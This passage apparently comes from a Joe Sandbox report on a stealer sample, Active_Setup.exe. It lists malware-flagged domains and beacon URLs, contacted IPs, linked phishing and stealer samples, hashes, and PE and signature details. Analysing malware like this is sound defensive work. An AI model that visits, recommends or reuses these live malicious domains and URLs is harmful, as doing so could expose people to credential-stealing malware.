                                                                                              http://ocsp.rootca1.amazontrust.com0:Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://klipvumisui.shop/int_clp_sha.txtn8JActive_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Active_Setup.exe, 00000000.00000003.1802226156.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790698899.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790589203.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1802125356.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.ecosia.org/newtab/Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brActive_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://curl.haxx.se/docs/http-cookies.htmlActive_Setup.exefalse
                                                                                                          		high
                                                                                                          https://klipvumisui.shop/Active_Setup.exe, 00000000.00000002.1934226305.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933666444.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://ac.ecosia.org/autocomplete?q=Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dfgh.online/powershell.exe, 00000004.00000002.1940316473.0000000002CEE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://cryofficesj.click/apijActive_Setup.exe, 00000000.00000003.1887755366.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1888154365.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://cryofficesj.click/apipXQActive_Setup.exe, 00000000.00000003.1877780850.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000002.1935389766.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860459644.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1908939711.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1888096331.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860424960.0000000003A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.openssl.org/support/faq.html....................Active_Setup.exefalse
                                                                                                              		high
                                                                                                              https://dfgh.online/invoker.php?compName=user-PCpowershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              		unknown
                                                                                                              https://support.microsofActive_Setup.exe, 00000000.00000003.1790589203.0000000003AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://dfgh.online/invoker.php?compName=user-PCtpowershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cryofficesj.click/Active_Setup.exe, 00000000.00000003.1888154365.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://klipvumisui.shop/int_clp_sha.txtG3Active_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesActive_Setup.exe, 00000000.00000003.1790698899.0000000003AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://cryofficesj.click/api_Active_Setup.exe, 00000000.00000003.1877831557.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      104.21.37.128
                                                                                                                      		klipvumisui.shopUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                      188.114.97.3
                                                                                                                      		cryofficesj.clickEuropean Union
                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                      185.161.251.21
                                                                                                                      		cegu.shopUnited Kingdom
                                                                                                                      		5089NTLGBfalse

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1582495
                                                                                                                      Start date and time:2024-12-30 18:18:10 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 5m 20s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:6
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:Active_Setup.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@4/3@4/3
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 50%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 23
                                                                                                                      • Number of non-executed functions: 202
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Stop behavior analysis, all processes terminated

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7956 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: Active_Setup.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      12:19:11API Interceptor10x Sleep call for process: Active_Setup.exe modified
                                                                                                                      12:19:27API Interceptor5x Sleep call for process: powershell.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      104.21.37.128@Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                            Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.rgenerousrs.store/o362/
                                                                                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.beylikduzu616161.xyz/2nga/
                                                                                                                              Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                                              ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                              • paste.ee/d/lxvbq
                                                                                                                              Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                              • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                                              PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                              http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                              • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                              gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                              Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                              • gmtagency.online/api/check
                                                                                                                              185.161.251.21installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                  Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                    MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              appFile.exeGet hashmaliciousLummaC StealerBrowse

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                cegu.shopinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                klipvumisui.shopinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.208.58
                                                                                                                                                @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.37.128
                                                                                                                                                MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.208.58
                                                                                                                                                installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.37.128
                                                                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.37.128
                                                                                                                                                @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.208.58
                                                                                                                                                Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.37.128

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.0.151
                                                                                                                                                https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.64.143
                                                                                                                                                https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                                                • 104.18.87.62
                                                                                                                                                BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 172.64.41.3
                                                                                                                                                UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.96.1
                                                                                                                                                PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.148.118
                                                                                                                                                https://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.18.35.227
                                                                                                                                                CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.0.151
                                                                                                                                                https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                                                • 104.17.25.14
                                                                                                                                                random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.64.143
                                                                                                                                                https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                                                • 104.18.87.62
                                                                                                                                                BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 172.64.41.3
                                                                                                                                                UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.21.96.1
                                                                                                                                                PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 172.67.148.118
                                                                                                                                                https://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.18.35.227
                                                                                                                                                NTLGBbotx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 82.31.53.184
                                                                                                                                                botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 62.31.100.59
                                                                                                                                                loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 82.37.70.27
                                                                                                                                                loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 82.42.160.251
                                                                                                                                                loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 163.164.159.5
                                                                                                                                                sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                • 86.17.1.166
                                                                                                                                                x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                • 82.16.218.110
                                                                                                                                                installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 185.161.251.21
                                                                                                                                                @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 185.161.251.21

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21
                                                                                                                                                6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 188.114.97.3
                                                                                                                                                • 185.161.251.21

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                                MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                                SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                                SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                                SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:@...e................................................@..........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbj4yhzr.wjp.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_te23itw2.y2t.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):0.5723397968533982
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Active_Setup.exe
                                                                                                                                                File size:76'054'693 bytes
                                                                                                                                                MD5:b106a3a66916985d5e5b6cbbb6c5b07c
                                                                                                                                                SHA1:91ac93059958c0267bd8a909ed83284fdc8e4c7d
                                                                                                                                                SHA256:195f6445fe4cc70d48c65e973008336c82a0455163e51152c05f2b4ce32963f5
                                                                                                                                                SHA512:8d95044211c28ab5ca20db1428ef875937455edd54e47ea8153595b45a517883f25b19114ead459d27046ce31f28e2958a13436c5a7510814c5fafd4d4565b04
                                                                                                                                                SSDEEP:24576:lo/ZNcUCnAyxEsZK3gYaRzHKFzc+Te7pnPkEGBWSp/Mcd//vXui12Sf:4GntEx3gYajWBnp/Mcd//v+G2Sf
                                                                                                                                                TLSH:03F7D4B2FE00BAF2978AC9ED05A2DAD9D9B663003333E8F751453586ED0B4D84336D59
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........$...w...w...wr..w...w...w...w...w...w...w...w...wk..w...w...w...w...w...w...w...w...wRich...w........PE..L...i.Gc...........

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x4d0da5
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x6347D069 [Thu Oct 13 08:46:33 2022 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:732f95b0ac9f9cb56d01e5eebb88cf9d

                                                                                                                                                Authenticode Signature

                                                                                                                                                Signature Valid:false
                                                                                                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                Error Number:-2146869232
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                                                                Subject Chain
                                                                                                                                                • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                                Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                                Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                                Serial:33000003DFFB6AE3F427ECB6A30000000003DF

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                call 00007FCA28B9429Eh
                                                                                                                                                jmp 00007FCA28B8840Ah
                                                                                                                                                mov edi, edi
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
